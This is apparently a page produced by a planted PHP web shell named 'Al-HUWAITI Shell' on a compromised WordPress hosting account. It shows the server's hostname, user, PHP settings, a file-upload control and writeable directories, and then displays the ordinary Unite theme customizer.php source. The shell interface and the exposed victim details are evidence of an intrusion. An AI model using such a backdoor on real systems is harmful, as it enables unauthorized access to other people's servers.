hello 404 Not Found
Al-HUWAITI Shell
Al-huwaiti


Server : Apache
System : Linux webm006.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : chryzalihi ( 621211)
PHP Version : 8.3.31
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
Directory :  /home/chryzalihi/www/wp-contentOLD/themes/unite/inc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/chryzalihi/www/wp-contentOLD/themes/unite/inc/customizer.php
<?php
/**
 * _s Theme Customizer
 *
 * @package unite
 */

/**
 * Add postMessage support for site title and description for the Theme Customizer.
 *
 * @param WP_Customize_Manager $wp_customize Theme Customizer object.
 */
function unite_customize_register( $wp_customize ) {
	$wp_customize->get_setting( 'blogname' )->transport         = 'postMessage';
	$wp_customize->get_setting( 'blogdescription' )->transport  = 'postMessage';
	$wp_customize->get_setting( 'header_textcolor' )->transport = 'postMessage';
}
add_action( 'customize_register', 'unite_customize_register' );

/**
 * Binds JS handlers to make Theme Customizer preview reload changes asynchronously.
 */
function unite_customize_preview_js() {
	wp_enqueue_script( 'unite_customizer', get_template_directory_uri() . '/inc/js/customizer.js', array( 'customize-preview' ), '20130508', true );
}
add_action( 'customize_preview_init', 'unite_customize_preview_js' );

/**
 * Options for Unite Theme Customizer.
 */
function unite_customizer( $wp_customize ) {
    
    /* Main option Settings Panel */
    $wp_customize->add_panel('unite_main_options', array(
        'capability' => 'edit_theme_options',
        'theme_supports' => '',
        'title' => __('Unite Options', 'unite'),
        'description' => __('Panel to update unite theme options', 'unite'), // Include html tags such as <p>.
        'priority' => 10 // Mixed with top-level-section hierarchy.
    ));

        $wp_customize->add_section('unite_layout_options', array(
            'title' => __('Layout options', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));
            // Layout options
            $blog_layout = Unite_Helper::get_blog_layout();
            $wp_customize->add_setting('unite[blog_settings]', array(
                 'default' => '1',
                 'type' => 'option',
                 'sanitize_callback' => 'unite_sanitize_blog_layout'
            ));
            $wp_customize->add_control('unite[blog_settings]', array(
                 'label' => __('Blog Layout', 'unite'),
                 'section' => 'unite_layout_options',
                 'type'    => 'select',
                 'choices'    => $blog_layout
            ));
            
            $site_layout = Unite_Helper::get_site_layout();
            $wp_customize->add_setting('unite[site_layout]', array(
                 'default' => 'side-pull-left',
                 'type' => 'option',
                 'sanitize_callback' => 'unite_sanitize_layout'
            ));
            $wp_customize->add_control('unite[site_layout]', array(
                 'label' => __('Website Layout Options', 'unite'),
                 'section' => 'unite_layout_options',
                 'type'    => 'select',
                 'description' => __('Choose between different layout options to be used as default', 'unite'),
                 'choices'    => $site_layout
            ));

            $wp_customize->add_setting('unite[element_color]', array(
                'default' => '#54397e',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[element_color]', array(
                'label' => __('Element Color', 'unite'),
                'description'   => __('Default used if no color is selected','unite'),
                'section' => 'unite_layout_options',
                'settings' => 'unite[element_color]',
            )));

            $wp_customize->add_setting('unite[element_color_hover]', array(
                'default' => '#4b3371',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[element_color_hover]', array(
                'label' => __('Element color on hover', 'unite'),
                'description'   => __('Default used if no color is selected','unite'),
                'section' => 'unite_layout_options',
                'settings' => 'unite[element_color_hover]',
            )));

        /* Unite Typography Options */
        $wp_customize->add_section('unite_typography_options', array(
            'title' => __('Typography', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));
            // Typography Defaults
            $typography_defaults = array(
                    'size'  => '14px',
                    'face'  => 'helvetica-neue',
                    'style' => 'normal',
                    'color' => '#6B6B6B'
            );
            // Typography Options
            $typography_options = Unite_Helper::get_typography_options();
            $wp_customize->add_setting('unite[main_body_typography][size]', array(
                'default' => $typography_defaults['size'],
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_typo_size'
            ));
            $wp_customize->add_control('unite[main_body_typography][size]', array(
                'label' => __('Main Body Text', 'unite'),
                'description' => __('Used in p tags', 'unite'),
                'section' => 'unite_typography_options',
                'type'    => 'select',
                'choices'    => $typography_options['sizes']
            ));
            $wp_customize->add_setting('unite[main_body_typography][face]', array(
                'default' => $typography_defaults['face'],
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_typo_face'
            ));
            $wp_customize->add_control('unite[main_body_typography][face]', array(
                'section' => 'unite_typography_options',
                'type'    => 'select',
                'choices'    => $typography_options['faces']
            ));
            $wp_customize->add_setting('unite[main_body_typography][style]', array(
                'default' => $typography_defaults['style'],
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_typo_style'
            ));
            $wp_customize->add_control('unite[main_body_typography][style]', array(
                'section' => 'unite_typography_options',
                'type'    => 'select',
                'choices'    => $typography_options['styles']
            ));
            $wp_customize->add_setting('unite[main_body_typography][color]', array(
                'default' => $typography_defaults['color'],
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[main_body_typography][color]', array(
                'section' => 'unite_typography_options',
            )));

            $wp_customize->add_setting('unite[heading_color]', array(
                'default' => '#54397E',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[heading_color]', array(
                'label' => __('Heading Color', 'unite'),
                'description'   => __('Color for all headings (h1-h6)','unite'),
                'section' => 'unite_typography_options',
            )));
            $wp_customize->add_setting('unite[link_color]', array(
                'default' => '#54397E',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[link_color]', array(
                'label' => __('Link Color', 'unite'),
                'description'   => __('Default used if no color is selected','unite'),
                'section' => 'unite_typography_options',
            )));
            $wp_customize->add_setting('unite[link_hover_color]', array(
                'default' => '#333',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[link_hover_color]', array(
                'label' => __('Link:hover Color', 'unite'),
                'description'   => __('Default used if no color is selected','unite'),
                'section' => 'unite_typography_options',
            )));
            
            $wp_customize->add_setting('unite[social_color]', array(
                'default' => '',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[social_color]', array(
                'label' => __('Social icon color', 'unite'),
                'description' => sprintf(__('Default used if no color is selected', 'unite')),
                'section' => 'unite_typography_options',
            )));
            
            /* Unite Header Options */
        $wp_customize->add_section('unite_header_options', array(
            'title' => __('Header', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));
            $wp_customize->add_setting('unite[top_nav_bg_color]', array(
                'default' => '#54397E',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[top_nav_bg_color]', array(
                'label' => __('Top nav background color', 'unite'),
                'description'   => __('Default used if no color is selected','unite'),
                'section' => 'unite_header_options',
            )));
            $wp_customize->add_setting('unite[top_nav_link_color]', array(
                'default' => '#fff',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[top_nav_link_color]', array(
                'label' => __('Top nav item color', 'unite'),
                'description'   => __('Link color','unite'),
                'section' => 'unite_header_options',
            )));

            $wp_customize->add_setting('unite[top_nav_dropdown_bg]', array(
                'default' => '#54397E',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[top_nav_dropdown_bg]', array(
                'label' => __('Top nav dropdown background color', 'unite'),
                'description'   => __('Background of dropdown item hover color','unite'),
                'section' => 'unite_header_options',
            )));

            $wp_customize->add_setting('unite[top_nav_dropdown_item]', array(
                'default' => '#fff',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[top_nav_dropdown_item]', array(
                'label' => __('Top nav dropdown item color', 'unite'),
                'description'   => __('Dropdown item color','unite'),
                'section' => 'unite_header_options',
            )));

        /* Unite Footer Options */
        $wp_customize->add_section('unite_footer_options', array(
            'title' => __('Footer', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));

            $wp_customize->add_setting('unite[footer_bg_color]', array(
                'default' => '#54397E',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[footer_bg_color]', array(
                'label' => __('Footer background color', 'unite'),
                'section' => 'unite_footer_options',
            )));

            $wp_customize->add_setting('unite[footer_text_color]', array(
                'default' => '#999',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[footer_text_color]', array(
                'label' => __('Footer text color', 'unite'),
                'section' => 'unite_footer_options',
            )));

            $wp_customize->add_setting('unite[footer_link_color]', array(
                'default' => '#eee',
                'type'  => 'option',
                'sanitize_callback' => 'unite_sanitize_hexcolor'
            ));
            $wp_customize->add_control(new WP_Customize_Color_Control($wp_customize, 'unite[footer_link_color]', array(
                'label' => __('Footer link color', 'unite'),
                'section' => 'unite_footer_options',
            )));

            $wp_customize->add_setting('unite[custom_footer_text]', array(
                'default' => '',
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_strip_slashes'
            ));
            $wp_customize->add_control('unite[custom_footer_text]', array(
                'label' => __('Footer information', 'unite'),
                'description' => sprintf(__('Copyright text in footer', 'unite')),
                'section' => 'unite_footer_options',
                'type' => 'textarea'
            ));

        /* Unite Content Options */
        $wp_customize->add_section('unite_content_options', array(
            'title' => __('Content Options', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));
            $wp_customize->add_setting('unite[single_post_image]', array(
                'default' => 1,
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_strip_slashes'
            ));
            $wp_customize->add_control('unite[single_post_image]', array(
                'label' => __('Display Featured Image on Single Post', 'unite'),
                'section' => 'unite_content_options',
                'type' => 'checkbox'
            ));

        /* Unite Other Options */
        $wp_customize->add_section('unite_other_options', array(
            'title' => __('Other', 'unite'),
            'priority' => 31,
            'panel' => 'unite_main_options'
        ));
            $wp_customize->add_setting('unite[custom_css]', array(
                'default' => '',
                'type' => 'option',
                'sanitize_callback' => 'unite_sanitize_strip_slashes'
            ));
            $wp_customize->add_control('unite[custom_css]', array(
                'label' => __('Custom CSS', 'unite'),
                'description' => sprintf(__('Additional CSS', 'unite')),
                'section' => 'unite_other_options',
                'type' => 'textarea'
            ));

        $wp_customize->add_section('unite_important_links', array(
            'priority' => 5,
            'title' => __('Support and Documentation', 'unite')
        ));
            $wp_customize->add_setting('unite[imp_links]', array(
              'sanitize_callback' => 'esc_url_raw'
            ));
            $wp_customize->add_control(
            new Unite_Important_Links(
            $wp_customize,
                'unite[imp_links]', array(
                'section' => 'unite_important_links',
                'type' => 'unite-important-links'
            )));

}
add_action( 'customize_register', 'unite_customizer' );



/**
 * Sanitize checkbox for WordPress customizer
 */
function unite_sanitize_checkbox( $input ) {
    if ( $input == 1 ) {
        return 1;
    } else {
        return '';
    }
}
/**
 * Adds sanitization callback function: colors
 * @package Unite
 */
function unite_sanitize_hexcolor($color) {
    if ($unhashed = sanitize_hex_color_no_hash($color))
        return '#' . $unhashed;
    return $color;
}

/**
 * Adds sanitization callback function: Nohtml
 * @package Unite
 */
function unite_sanitize_nohtml($input) {
    return wp_filter_nohtml_kses($input);
}

/**
 * Adds sanitization callback function: Number
 * @package Unite
 */
function unite_sanitize_number($input) {
    if ( isset( $input ) && is_numeric( $input ) ) {
        return $input;
    }
}

/**
 * Adds sanitization callback function: Strip Slashes
 * @package Unite
 */
function unite_sanitize_strip_slashes($input) {
    return wp_kses_stripslashes($input);
}

/**
 * Adds sanitization callback function: Slider Category
 * @package Unite
 */
function unite_sanitize_slidecat( $input ) {
    global $options_categories;
    if ( array_key_exists( $input, $options_categories ) ) {
        return $input;
    } else {
        return '';
    }
}

/**
 * Adds sanitization callback function: Sidebar Layout
 * @package Unite
 */
function unite_sanitize_blog_layout( $input ) {
    $blog_layout = Unite_Helper::get_blog_layout();
    if ( array_key_exists( $input, $blog_layout ) ) {
        return $input;
    } else {
        return '';
    }
}

/**
 * Adds sanitization callback function: Sidebar Layout
 * @package Unite
 */
function unite_sanitize_layout( $input ) {
    $site_layout = Unite_Helper::get_site_layout();
    if ( array_key_exists( $input, $site_layout ) ) {
        return $input;
    } else {
        return '';
    }
}

/**
 * Adds sanitization callback function: Typography Size
 * @package Unite
 */
function unite_sanitize_typo_size( $input ) {
    global $typography_options,$typography_defaults;
    if ( array_key_exists( $input, $typography_options['sizes'] ) ) {
        return $input;
    } else {
        return $typography_defaults['size'];
    }
}
/**
 * Adds sanitization callback function: Typography Face
 * @package Unite
 */
function unite_sanitize_typo_face( $input ) {
    global $typography_options,$typography_defaults;
    if ( array_key_exists( $input, $typography_options['faces'] ) ) {
        return $input;
    } else {
        return $typography_defaults['face'];
    }
}
/**
 * Adds sanitization callback function: Typography Style
 * @package Unite
 */
function unite_sanitize_typo_style( $input ) {
    global $typography_options,$typography_defaults;
    if ( array_key_exists( $input, $typography_options['styles'] ) ) {
        return $input;
    } else {
        return $typography_defaults['style'];
    }
}

/**
 * Add CSS for custom controls
 */
function unite_customizer_custom_control_css() {
	?>
    <style>
        #customize-control-unite-main_body_typography-size select, #customize-control-unite-main_body_typography-face select,#customize-control-unite-main_body_typography-style select { width: 60%; }
    </style><?php
}
add_action( 'customize_controls_print_styles', 'unite_customizer_custom_control_css' );

if ( ! class_exists( 'WP_Customize_Control' ) )
    return NULL;
/**
 * Class to create a Unite important links
 */
class Unite_Important_Links extends WP_Customize_Control {

   public $type = "unite-important-links";

   public function render_content() {?>

        <div class="inside">
            <p><b><a href="http://colorlib.com/wp/support/unite"><?php _e('Unite Documentation','unite'); ?></a></b></p>
            <p><?php _e('The best way to contact us with <b>support questions</b> and <b>bug reports</b> is via','unite') ?> <a href="http://colorlib.com/wp/forums"><?php _e('Colorlib support forum','unite') ?></a>.</p>
            <p><?php _e('If you like this theme, I\'d appreciate any of the following:','unite') ?></p>
            <ul>
                <li><a class="button" href="http://wordpress.org/support/view/theme-reviews/unite?filter=5" title="<?php esc_attr_e('Rate this Theme', 'unite'); ?>" target="_blank"><?php esc_html_e('Rate this Theme','unite'); ?></a></li>
                <li><a class="button" href="http://www.facebook.com/colorlib" title="<?php esc_attr_e('Like Colorlib on Facebook','unite'); ?>" target="_blank"><?php esc_html_e('Like on Facebook','unite'); ?></a></li>
                <li><a class="button" href="http://twitter.com/colorlib/" title="<?php esc_attr_e('Follow Colorlib on Twitter','unite'); ?>" target="_blank"><?php esc_html_e('Follow on Twitter','unite'); ?></a></li>
            </ul>
        </div><?php
   }

}

/*
 * Custom Scripts
 */
add_action( 'customize_controls_print_footer_scripts', 'unite_customizer_custom_scripts' );

function unite_customizer_custom_scripts() { ?>
<style>
    li#accordion-section-unite_important_links h3.accordion-section-title, li#accordion-section-unite_important_links h3.accordion-section-title:focus { background-color: #00cc00 !important; color: #fff !important; }
    li#accordion-section-unite_important_links h3.accordion-section-title:hover { background-color: #00b200 !important; color: #fff !important; }
    li#accordion-section-unite_important_links h3.accordion-section-title:after { color: #fff !important; }
</style>
<?php
}

Al-HUWAITI Shell